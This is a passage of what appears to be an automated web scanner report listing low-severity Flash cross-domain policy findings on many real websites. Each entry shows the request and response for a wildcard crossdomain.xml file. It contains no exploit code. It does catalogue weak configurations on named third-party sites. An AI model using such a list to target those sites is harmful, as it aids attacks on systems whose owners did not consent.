Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.film4.com

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=922
Content-Type: text/html; charset=UTF-8
Date: Wed, 04 May 2011 03:40:06 GMT
Keep-Alive: timeout=15, max=98
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 05 Apr 2011 15:11:56 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache-Info: caching
Content-Length: 339

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="*.channel4.com" secure="true"/>
   <allow-access-from domain="*.brightcove.com" secure="true"/>
   <allow-access-from domain="realmedia.channel4.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.film4.com" secure="true"/>
...[SNIP]...

6.158. http://www.foxsportsmidwest.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsmidwest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxsportsmidwest.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 08 Nov 2010 18:35:16 GMT
ETag: "1cd9ee98-d9-e2ab8100"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: application/xml
Date: Wed, 04 May 2011 04:14:17 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.edgecastcdn.net" />
<allow-access-from domain="*.brandaffinity.net" />
<allow-access-from domain="*.netbat.com" />
</cro
...[SNIP]...

6.159. http://www.goldaffiliateprogram.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.goldaffiliateprogram.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goldaffiliateprogram.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:16 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Last-Modified: Fri, 17 Oct 2008 14:23:20 GMT
ETag: "da-45973b505a600"
Accept-Ranges: bytes
Content-Length: 218
X-Server-Name: www@dc1dtweb16
Keep-Alive: timeout=3, max=998
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.directtrack.com" />
</cro
...[SNIP]...

6.160. http://www.golfholiday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.golfholiday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.golfholiday.com

Response

HTTP/1.1 200 OK
Content-Length: 313
Content-Type: text/xml
Content-Location: http://www.golfholiday.com/crossdomain.xml
Last-Modified: Fri, 16 Jan 2009 15:40:11 GMT
Accept-Ranges: bytes
ETag: "80ff6cb7f077c91:1ea394"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:44:29 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*.ifg.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.161. http://www.hutchnews.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hutchnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hutchnews.com

Response

HTTP/1.1 200 OK
Content-Length: 1158
Content-Type: text/xml
Content-Location: http://www.hutchnews.com/crossdomain.xml
Last-Modified: Mon, 28 Mar 2011 20:37:52 GMT
Accept-Ranges: bytes
ETag: "31704e288edcb1:0"
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:23:27 GMT
Connection: close
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f3545525d5f4f58455e445a4a423660;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.mediaspanonline.com" />
<allow-access-from domain="mediaspanonline.com" />
<allow-access-from domain="*.mediaspanonline.com" />
<allow-access-from domain="assets.mediaspanonline.com" />
<allow-access-from domain="*.nassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.net" />
<allow-access-from domain="nassauguardian.net" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.cocentral.com" />
<allow-access-from domain="*.mediaspangroup.com" />
<allow-access-from domain="*.mediaspansoftware.com" />
<allow-access-from domain="*.fimc.net" />
<allow-access-from domain="*.firstmediaworks.com" />
<allow-access-from domain="*.firstmediaworks.net" />
<allow-access-from domain="*.firstmediaworks.org" />
...[SNIP]...

6.162. http://www.icelandair.is/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.icelandair.is
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.icelandair.is

Response

HTTP/1.1 200 OK
Set-Cookie: icelb=R3919127566; path=/; expires=Thu, 05-May-2011 02:31:43 GMT
Date: Wed, 04 May 2011 02:23:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 27 Aug 2009 11:39:06 GMT
Accept-Ranges: bytes
Content-Length: 544
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=240
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.icelandair.is"/>
<allow-access-from domain="icelandair.is"/>
<allow-access-from domain="*.mbl.is" />
<allow-access-from domain="mbl.is" />
<allow-access-from domain="*.gagarin.is" />
<allow-access-from domain="gagarin.is" />
<allow-access-from domain="*.icelandair.net"/>
<allow-access-from domain="icelandair.net"/>
...[SNIP]...

6.163. http://www.ifamouz.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ifamouz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ifamouz.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 02:43:39 GMT
Content-Type: text/xml
Content-Length: 294
Last-Modified: Wed, 23 Mar 2011 16:47:08 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="*.arrematenoleilao.com" />

<allow-access-from domain="*.arrematenoleilao.com.br" />
...[SNIP]...

6.164. http://www.imbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.imbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imbc.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 507
Content-Type: text/xml
Last-Modified: Tue, 29 Mar 2011 03:47:04 GMT
Accept-Ranges: bytes
ETag: "06caef7c3edcb1:6fe"
Date: Wed, 04 May 2011 01:06:11 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="swf.imbc.com" />
<allow-access-from domain="imbbs.imbc.com" />
<allow-access-from domain="withmbc.imbc.com" />
<allow-access-from domain="edu.imbc.com" />
<allow-access-from domain="*.imbc.com" />
<allow-access-from domain="conting.imbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="img.sbs.co.kr"/>
...[SNIP]...

6.165. http://www.indavideo.hu/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.indavideo.hu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.indavideo.hu

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Accept-Ranges: bytes
ETag: "1522340670"
Last-Modified: Wed, 01 Dec 2010 05:19:27 GMT
Content-Length: 322
Connection: close
Date: Wed, 04 May 2011 02:36:53 GMT
Server: lighttpd/1.4.28

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.indavideo.hu"/>
   <allow-access-from domain="*.index.hu"/>
...[SNIP]...

6.166. http://www.intermediaoutdoors.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intermediaoutdoors.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intermediaoutdoors.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:04:36 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 27 Oct 2009 16:47:53 GMT
ETag: "14fc81a-460-7076c040"
Accept-Ranges: bytes
Content-Length: 1120
Connection: close
Content-Type: text/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
<allow-access-from domain="*.floridasportsman.com"/>
<allow-access-from domain="*.gunsandammomag.com"/>
<allow-access-from domain="*.in-fisherman.com"/>
<allow-access-from domain="*.flyfisherman.com"/>
<allow-access-from domain="*.petersenshunting.com"/>
<allow-access-from domain="*.northamericanwhitetail.com"/>
<allow-access-from domain="*.gameandfishmag.com"/>
<allow-access-from domain="*.arrowaffliction.tv"/>
<allow-access-from domain="*.tacticalimpact.tv"/>
<allow-access-from domain="*.gunsandammotv.tv"/>
<allow-access-from domain="*.tacticalarms.tv"/>
<allow-access-from domain="*.predatornation.tv"/
<allow-access-from domain="*.handgunstv.com"/
<allow-access-from domain="*.nawt.tv"/
<allow-access-from domain="*.bowhunter.tv"/
<allow-access-from domain="*.petersenshunting.tv"/
</cross-domain-policy>
...[SNIP]...

6.167. http://www.junodownload.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.junodownload.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.junodownload.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:55:42 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 12:15:29 GMT
Accept-Ranges: bytes
Content-Length: 340
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" />
   <allow-access-from secure="false" domain="*.juno.co.uk" />
   <allow-access-from secure="false" domain="*.junodownload.com" />
   <allow-access-from secure="false" domain="www.junostatic.com" />
...[SNIP]...

6.168. http://www.kboi2.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kboi2.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kboi2.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 02 May 2011 05:07:07 GMT
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/xml;charset=utf-8
Date: Wed, 04 May 2011 01:58:39 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0
X-N: S

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

6.169. http://www.keepbusy.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.keepbusy.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.keepbusy.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:30:39 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.10
Last-Modified: Wed, 07 Oct 2009 15:29:32 GMT
ETag: "f50028-de-4755a036faf00"
Accept-Ranges: bytes
Content-Length: 222
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
       

<cross-domain-policy>
       

<allow-access-from domain="*.keepbusy.net" />
       

<
...[SNIP]...

6.170. http://www.keprtv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.keprtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.keprtv.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 19 Apr 2011 18:57:34 GMT
X-Server-Name: dv-c1-r1-u24-b4
Content-Type: text/xml;charset=utf-8
Date: Wed, 04 May 2011 01:12:10 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0
X-N: S

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
